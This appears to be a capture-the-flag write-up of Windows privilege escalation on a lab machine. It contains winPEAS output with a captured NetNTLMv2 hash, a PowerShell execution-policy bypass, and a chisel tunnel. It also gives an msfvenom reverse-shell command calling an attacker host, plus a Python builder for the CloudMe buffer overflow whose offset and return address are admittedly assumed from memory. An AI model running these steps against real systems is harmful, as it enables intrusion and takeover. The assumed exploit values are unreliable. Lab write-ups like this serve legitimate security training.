4 privesc
powershell -c ". .\PowerUp.ps1"
. : File C:\Users\shaun\Desktop\PowerUp.ps1 cannot be loaded because running scripts is disabled on this system.
(The execution policy is not a security boundary; `powershell -ExecutionPolicy Bypass -File .\PowerUp.ps1` or piping the file into `Invoke-Expression` would load it. winPEAS is used instead below.)
PEAS
[+] Interesting Processes -non Microsoft-
[?] Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
mysqld(1616)[C:\xampp\mysql\bin\mysqld.exe] -- POwn: shaun
Permissions: Authenticated Users [WriteData/CreateFiles]
Possible DLL Hijacking folder: C:\xampp\mysql\bin (Authenticated Users [WriteData/CreateFiles])
Command Line: mysql\bin\mysqld.exe --defaults-file=mysql\bin\my.ini --standalone
[+] Installed Applications --Via Program Files/Uninstall registry--
C:\xampp(Authenticated Users [WriteData/CreateFiles])
[+] Current TCP Listening Ports
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 127.0.0.1 8888 0.0.0.0 0 Listening 7844 CloudMe
TCP 127.0.0.1 50119 127.0.0.1 3306 Time Wait 0 Idle
[+] Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: shaun::BUFF:1122334455667788:82c51e794ecf6f8f2601e92f9f427604:0101000000000000f2a22adb5862d7018d58da0f88d54b4a000000000800300030000000000000000000000000200000809e2636c947a3055d0f688790b7439ceadd4b45d1e2e159332d222c915cfe400a00100000000000000000000000000000000000090000000000000000000000
XAMPP config file is at \xampp\phpMyAdmin\config.inc.php
XAMPP default-passwords file is at \xampp\passwords.txt
type config.inc.php
/* Authentication type and info */
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
MySQL is not connecting. Note also that mysqld.exe runs as shaun (POwn: shaun above), so the writable C:\xampp\mysql\bin folder would only let us hijack our own process, not escalate. Trying other avenues.
tasklist /v
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
CloudMe.exe 6996 0 26,948 K Unknown N/A 0:00:02 N/A
CloudMe 1.11.2 is running, bound to 127.0.0.1:8888, and has a public buffer overflow exploit. Because the service only listens on localhost, we need to port forward with chisel to reach it from the attack box.
$ chisel server -p 9000 --reverse
2021/06/15 22:03:25 server: Reverse tunnelling enabled
2021/06/15 22:03:25 server: Fingerprint Es2IzsdBxZvBH7IA83XgPvjVBg7LwkSXPpU6skdoAro=
2021/06/15 22:03:25 server: Listening on http://0.0.0.0:9000
2021/06/15 22:04:47 server: session#1: Client version (1.7.6) differs from server version (0.0.0-src)
2021/06/15 22:04:47 server: session#1: tun: proxy#R:8989=>8888: Listening
> chisel.exe client -v 10.10.16.161:9000 R:8989:127.0.0.1:8888
Using https://www.exploit-db.com/exploits/48389, with the msfvenom payload below swapped in and the target changed from 127.0.0.1:8888 to the local end of the chisel tunnel, 127.0.0.1:8989 on the attack box.
# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.16.161 LPORT=9090 -b '\x00\x0A\x0D' -f python -v payload
$ python ex.py
$ rlwrap nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.198] 49709
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
buff\administrator
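The exploit delivery step above, written out as an added example (this is not the exploit-db script or the original author's ex.py). It shows the two edits a practitioner has to make to 48389: point it at the attacker-side tunnel port (127.0.0.1:8989, which chisel relays to CloudMe's 127.0.0.1:8888 on Buff) and drop in the msfvenom `payload` variable, after checking that none of the excluded bad chars (`\x00\x0A\x0D`) survived. The offset, return address and total length are my recollection of the layout used by 48389 and are assumptions to confirm against the published script; the `payload` bytes are a constructed stand-in, not real shellcode.

```python
"""Build the CloudMe 1.11.2 overflow buffer and send it through the chisel tunnel."""
import socket
import struct

# Attacker-side end of the chisel reverse tunnel (R:8989:127.0.0.1:8888):
# connecting to 127.0.0.1:8989 on the attack box lands on CloudMe's
# 127.0.0.1:8888 on Buff. The stock 48389 script targets port 8888
# directly, which only works if it is run on the victim itself.
TUNNEL_HOST = "127.0.0.1"
TUNNEL_PORT = 8989

# Bytes excluded with msfvenom -b '\x00\x0A\x0D'.
BAD_CHARS = b"\x00\x0a\x0d"

# Overflow layout as used by exploit-db 48389 (ASSUMED from memory of that
# script; confirm offset/return address/total length before use).
OFFSET = 1052          # bytes of filler before the saved return address
RET = 0x68A842B5       # PUSH ESP; RET gadget in Qt5Core.dll (assumed)
NOP_SLED = b"\x90" * 30
TOTAL_LEN = 1500       # 48389 pads the request out to a fixed size (assumed)

# Replace this with the msfvenom output produced by
#   msfvenom ... -b '\x00\x0A\x0D' -f python -v payload
# The bytes below are a constructed placeholder (int3 sled), NOT shellcode.
payload = b""
payload += b"\xcc" * 8


def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> set:
    """Return the set of forbidden byte values that actually appear in data."""
    return {b for b in data if b in bad}


def build_buffer(shellcode: bytes, offset: int = OFFSET, ret: int = RET,
                 sled: bytes = NOP_SLED, total: int = TOTAL_LEN) -> bytes:
    """Assemble filler + return address + NOP sled + shellcode, padded to total."""
    found = find_bad_chars(shellcode)
    if found:
        raise ValueError(f"payload contains bad chars: {sorted(found)}")
    eip = struct.pack("<I", ret)  # little-endian 32-bit return address
    if find_bad_chars(eip):
        raise ValueError("return address contains bad chars")
    body = b"\x90" * offset + eip + sled + shellcode
    if len(body) > total:
        raise ValueError(f"buffer is {len(body)} bytes, exceeds {total}")
    # 48389 fills the remainder with \xC3 (RET) so the request keeps its size.
    return body + b"\xc3" * (total - len(body))


def send_buffer(buf: bytes, host: str = TUNNEL_HOST, port: int = TUNNEL_PORT) -> int:
    """Deliver the buffer to the tunnel endpoint; returns the number of bytes sent."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(buf)
    return len(buf)


if __name__ == "__main__":
    # Start `rlwrap nc -lvnp 9090` before running this.
    buf = build_buffer(payload)
    print(f"sending {len(buf)} bytes to {TUNNEL_HOST}:{TUNNEL_PORT} "
          f"(relayed by chisel to Buff 127.0.0.1:8888)")
    send_buffer(buf)
```

If `build_buffer` raises on bad chars, regenerate the payload with msfvenom rather than editing bytes by hand; a single stray `\x00` truncates the request before the overflow is reached.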